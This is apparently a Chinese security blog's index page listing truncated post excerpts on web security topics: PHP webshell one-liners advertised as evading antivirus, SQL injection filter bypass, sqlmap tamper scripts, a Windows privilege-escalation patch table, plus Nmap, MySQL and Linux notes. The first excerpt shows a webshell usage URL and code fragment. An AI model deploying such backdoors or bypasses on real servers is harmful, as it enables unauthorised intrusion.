冷
首页
安
生
本
友
冷
安
生
本
友
冷白开
最肯忘却古人诗·最不屑一顾是相思
冷白开 · 一杯冷却的白开水
分享一些无特征PHP一句话
分享些不需要动态函数、不用eval、不含敏感函数、免杀免拦截的一句话。(少部分一句话需要php5.4.8+、或sqlite/pdo/yaml/memcached扩展等) 原理:https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html 所有一句话使用方法基本都是: http:// target/shell.php?e=assert 密码pass 01 $e = $_REQUEST['e...
2017/10/16
web安全
0
MySQL添加用户、删除用户与授权
MySql中添加用户,新建数据库,用户授权,删除用户,修改密码(注意每行后边都跟个;表示一个命令语句结束): 1.新建用户 1.1 登录MYSQL: @>mysql -u root -p @>密码 1.2 创建用户: mysql> insert into mysql.user(Host,User,Password) values("localhost","test",password("1234")); 这样就创建了一个名为...
2017/10/16
web安全
0
16位的MD5加密和32位MD5加密的区别
MD5加密后所得到的通常是32位的编码,而在不少地方会用到16位的编码 它们有什么区别呢? 16位加密就是从32位MD5散列中把中间16位提取出来! 其实破解16位MD5散列要比破解32位MD5散列还慢 因为他多了一个步骤,就是使用32位加密后再把中间16位提取出来, 然后再进行对比 而破解32位的则不需要,加密后直接对比就可以了 admin...
2017/10/12
web安全
0
Nmap中文手册
译注 该Nmap参考指南中文版由Fei Yang <fyang1024@gmail.com>和Lei Li<lilei_721@6611.org> 从英文版本翻译而来。 我们希望这将使全世界使用中文的人们更了解Nmap,但我们不能保证该译本和官方的 英文版本一样完整,也不能保证同步更新。 它可以在Creative Commons Attribution License下被修改并重新发布...
2017/10/10
web安全
0
SQL注入绕过过滤字符
sql注入的原因 sql注入的原因,表面上说是因为 拼接字符串,构成sql语句,没有使用 sql语句预编译,绑定变量。 但是更深层次的原因是,将用户输入的字符串,当成了 “sql语句” 来执行。 比如上面的 String sql = "select id,no from user where id=" + id; 我们希望用户输入的 id 的值,仅仅作为一个字符串字面值,传入数...
2017/09/21
web安全
0
linux下find(文件查找)命令的用法总结
前言:我们为什么要学会使用find命令? 每一种操作系统都有成千上万的文件组成,对于linux这样“一切皆文件”的操作系统来说更不例外,大家应该都能很轻松使用windows下的文件查找功能,但是对linux这一功能可能并不是很熟悉,其实想玩linux的你更要牢牢掌握这个命令,因为linux不像windows那样有固定的文件名后缀...
2017/07/27
web安全
0
Linux 下安装 Tomcat 6 步骤
(1)、去Apache 官网(http://tomcat.apache.org/download-60.cgi)下载 apache-tomcat-6.0.29.tar.gz文件。 (2)、解压并且解包 输入命令: tar -zxvf apache-tomcat-6.0.29.tar.gz 在目录下有apache-tomcat-6.0.29文件夹,重命名为tomcat (3)、修改环境变量 在目录/etc下修改profile文件 export CATALINA_HOME=/usr/local/...
2017/07/25
web安全
0
windows本地提权对照表
KB2360937 MS10-084 KB2478960 MS11-014 KB2507938 MS11-056 KB2566454 MS11-062 KB2646524 MS12-003 KB2645640 MS12-009 KB2641653 MS12-018 KB944653 MS07-067 KB952004 MS09-012 PR KB971657 MS09-041 KB2620712 MS11-097 KB2393802 MS11-011 kb942831 MS08-005 KB2503665 MS11-046 KB2592799 MS11-080 KB956572 MS09...
2017/07/10
web安全
0
SQLmap tamper脚本注释
01. apostrophemask.py 用UTF-8全角字符替换单引号字符 02. apostrophenullencode.py 用非法双字节unicode字符替换单引号字符 03. appendnullbyte.py 在payload末尾添加空字符编码 04. base64encode.py 对给定的payload全部字符使用Base64编码 05. between.py 分别用“NOT BETWEEN 0 ...
2017/07/07
web安全
3
SQLmap用户手册
http://192.168.136.131/sqlmap/mysql/get_int.php?id=1 当给sqlmap这么一个url的时候,它会: 1、判断可注入的参数 2、判断可以用那种SQL注入技术来注入 3、识别出哪种数据库 4、根据用户选择,读取哪些数据 sqlmap支持五种不同的注入模式: 1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。 2、基于时间的...
2017/07/07
web安全
0
点击查看更多